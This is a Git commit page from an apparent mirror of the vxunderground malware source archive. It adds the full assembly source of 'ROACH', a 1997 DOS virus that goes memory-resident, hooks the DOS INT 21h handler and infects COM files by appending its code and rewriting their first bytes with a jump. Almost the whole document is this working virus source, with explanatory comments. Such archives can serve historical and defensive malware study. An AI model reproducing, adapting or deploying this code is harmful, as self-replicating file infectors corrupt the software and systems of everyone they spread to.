daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-15 15:29:23 +00:00
Code Issues Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground
2021-01-12 17:58:25 -06:00
committed by GitHub
parent b60161f008
commit 5dd4938a52
99 changed files with 41606 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/Virus.MSDOS.Unknown.roach.asm
+311
View File
@@ -0,0 +1,311 @@
;Developed and Programmed in Australia.
;Copy_ya_right 1997
;Virus Name : ROACH
;The ROACH virus will install itself memory resident, below the video memory.
;once this virus is in memory it will only infect COM files. It will not
;infect command.com.
;--------------------------- S T A R T -------------------------------------
host_start: ;start of the host file
jmp virus_start ;start the virus code
mov ah,4ch ;exit the virus code
int 21h ;dos call
;----- This is the start of the virus code ----------------------------------
virus_start: ;start of the virus code
mov ax,sp ;load ax with stack pointer
mov si,ax ;move stack pointer to si
mov ax,ss ;move stack segment to ax
mov ds,ax ;load ds with stack segment
mov di,100h ;point to the host start
mov cx,2 ;we need to do this twice
push_100_to_stack:
dec si,2 ;dec the stack pointer
mov sp,si ;move the stack pointer
mov word ptr ds:[si],di ;save di to the stack
loop push_100_to_stack ;do it twice
inc di ;inc byte one
mov al,byte ptr es:[di]
mov ah,byte ptr es:[di+1]
add ax,103h
mov bp,ax ;save to the
add si,2 ;inc the stack pointer
mov sp,si ;mov the stack pointer
mov di,word ptr ds:[si] ;get the address from stack
mov si,bp ;load si with fix address
add si,virus_len ;and host to the source index
sub si,3
push es
pop ds ;get the data segment
mov cx,3 ;move 3 bytes
rep movsb ;and move the data back
mov ax,5432h ;are we resident
int 21h ;dos call
cmp ax,0063h ;are we resident
jne memory_resident ;lets go resident
exit_virus:
xor ax,ax ;fix up
mov bx,ax ;fix up
mov cx,ax ;fix up
mov dx,ax ;fix up
mov di,ax ;fix up
mov si,ax ;fix up
mov es,ax ;fix up
ret ;and return to the host
;----- This makes the virus go memory resident ------------------------------
memory_resident:
mov ah,52h ;get the list of lists
int 21h ;dos call
mov ax,es:[bx-2] ;load ax first mcb chain
mov es,ax ;set es to first mcb block
mcb1:
cmp byte ptr es:[0],'Z' ;is it the last mcb chain
jne mcb2 ;not then next mcb chain
clc ;clear carry flag
jmp mcbx ;found last mcb chain, bail
mcb2:
mov ax,es ;mov extra segment to ax
add ax,word ptr es:[3] ;add from the list
inc ax ;fix up
mov es,ax ;es is the new segment
jmp short mcb1 ;and do it again
mcbx:
mov byte ptr es:[0],'Z' ;make it the last mcb chain
sub word ptr es:[3],virus_len/15 ;take the virus from the mcb
add ax,word ptr es:[3] ;
inc ax ;fix up the address
mov es,ax ;es is the new segment
push es ;save to the stack
push cs ;push the code segment
pop ds ;get ds from the stack
mov ax,3521h ;get interrupt 21h
int 21h ;dos call
mov si,bp ;load the si with virus start
add si,virus_len ;add the virus len to it
sub si,7
mov word ptr ds:[si],bx ;save the old int 21h vector
mov word ptr ds:[si+2],es ;save the old int 21h vector
pop ds ;get from the stack
mov ax,2521h ;get the interrupt vector
mov dx,new_21
int 21h ;dos call
push ds
pop es
push cs
pop ds
xor di,di
mov si,bp ;offset of the start of virus
mov cx,virus_len ;number of bytes to move
do_load_tsr:
mov ax,word ptr ds:[si] ;load the byte from host
mov word ptr es:[di],ax ;store the byte in memory
add si,2 ;inc the host pointer
add di,2 ;inc the memory pointer
loop do_load_tsr
push cs ;push the code segment
pop ds ;reset ds to the original
jmp exit_virus ;exit the virus code
db '[Roach] by SliceMaster 1997' ;copyright string roach
;----- This is the code that runs in memory ---------------------------------
exit_virus_tsr:
jmp dword ptr cs:[data_start] ;exit back to the function
fake_dos_function:
pushf ;save the flags
call dword ptr cs:[data_start] ;fake a dos call
ret ;and return
new_21h:
cmp ax,5432h ;is it the virus checking
jne check_interrupts ;check out the interrupts
mov ax,0063h ;yep we are in memory
iret ;interrupt return
check_interrupts:
inc ah ;add one the the function
cmp ah,4ch ;load and exec a program
je go_virus_infect ;this is our interrupt
cmp ah,3eh ;open file call
je go_virus_infect ;this is our interrupt
cmp ah,44h ;change attrubute call
je go_virus_infect ;this is our interrupt
dec ah ;sub one from the function
jmp exit_virus_tsr ;exit the virus in memory
go_virus_infect:
dec ah ;fix up before we exit
push ax ;\
push bx ; \
push cx ; \
push dx ; \
push si ; / save to the stack
push di ; / so the interrupt
push ds ; / will work on
push es ; / exit.
push bp ;/
call check_ext ;is it a com file
call open_host ;open the host file for r/w
call read_host_3 ;read the host first 3
call infect_host ;infect file
exit_host_infected:
call close_host ;close the host file
exit_virus_memory: ;ti we are here.
pop ax ;/
jmp exit_virus_tsr ;exit the virus tsr
;----- This checks the file ext --------------------------------------------
check_ext:
push dx
pop si ;get the source index
mov cx,0ffh ;search for a com file ext
find_ext:
mov al,byte ptr ds:[si] ;load the byte at ds:dx
cmp al,'.' ;is it a .
je found_ext ;found the ext
inc si ;inc the location
loop find_ext ;do it again
found_ext:
inc si ;inc the position
mov ax,word ptr ds:[si] ;load the byte ad ds:si
cmp ax,'OC' ;is it a com file
je found_com_file ;do a nother check
pop ax ;get off the stack
jmp exit_virus_memory ;not com file bail
found_com_file:
ret ;and return
;----- This opens a host file -----------------------------------------------
open_host:
mov ax,3d02h ;open file read write access
call fake_dos_function ;fake a dos interrupt
mov bx,ax ;move the handle into bx
ret ;and return
;----- This closes a host file ----------------------------------------------
close_host:
mov ah,3eh ;close a file
call fake_dos_function ;close the file
ret ;and return
;----- This reads the first 3 bytes from the host ---------------------------
read_host_3:
push ds ;save to the stack
push dx ;save to the stack
push cs ;push the code segment
pop ds ;get the tsr segment
xor dx,dx ;zero out dx
add dx,virus_len ;add the virus len to it
sub dx,3 ;fix up dx to point to buffer
push dx ;save to the stack
mov ah,3fh ;read from the host
mov cx,3 ;read 3 bytes of host
call fake_dos_function ;fake a dos call
pop si ;get si from the stack
mov ah,byte ptr ds:[si] ;load ah with the first byte
cmp ah,0e9h ;is it a jump instruction
je is_infect ;is the file infected
cmp ah,'M' ;does it have a MZ header
je is_infect ;the file is a command.com
pop dx ;get call from the stack
pop ds ;get call from the stack
ret ;and return
is_infect:
pop dx ;get from the stack
pop ds ;get call from the stack
pop ax ;get call from the stack
jmp exit_host_infected ;exit the host is infected
;----- This infects the host file -------------------------------------------
infect_host:
push ds ;save to the stack
push dx ;save to the stack
call lseek_end ;seek to the end of the host
push ax ;save the location
push cs ;push the code segment
pop ds ;get the virus segment
mov ah,40h ;time to write virus to end
mov cx,virus_len ;number of bytes to write
xor dx,dx ;at the start of the segment
call fake_dos_function ;fake a dos function
call lseek_start ;seek to the start
xor dx,dx ;zero out dx
add dx,virus_len ;add the virus len to it
sub dx,3 ;fix up dx to point to buffer
mov si,dx ;mov si the pointer
mov ah,0e9h ;mov jump instruction in ah
mov byte ptr ds:[si],ah ;write the jump in
pop ax ;get off the stack
dec al,3
mov word ptr ds:[si+1],ax ;write the address to buffer
mov dx,si ;write to dx the pointer
mov cx,3 ;number of bytes to write
mov ah,40h ;write to the host file
call fake_dos_function ;fake a dos function call
pop dx ;get off the stack
pop ds ;get off the stack
ret ;and return
;----- This seeks to the start or end of the host ---------------------------
lseek_end:
mov ax,4202h ;seek to the end
jmp lseek ;and do the seeking
lseek_start:
mov ax,4200h ;seek to the start
lseek:
xor dx,dx ;to start/end of host
xor cx,cx ;to start/end of host
call fake_dos_function ;fake a dos call
ret ;and return
;----- From here down is were all the data for virus is stored!! ------------
data1:
old_21h dd 0 ;old interrupt 21h function
host_3 db 3 dup(90h) ;original first 3 bytes
virus_end:
virus_len equ virus_end - virus_start ;len of the virus code
data_start equ data1 - virus_start ;starting address of data
new_21 equ new_21h - virus_start ;len from the start to int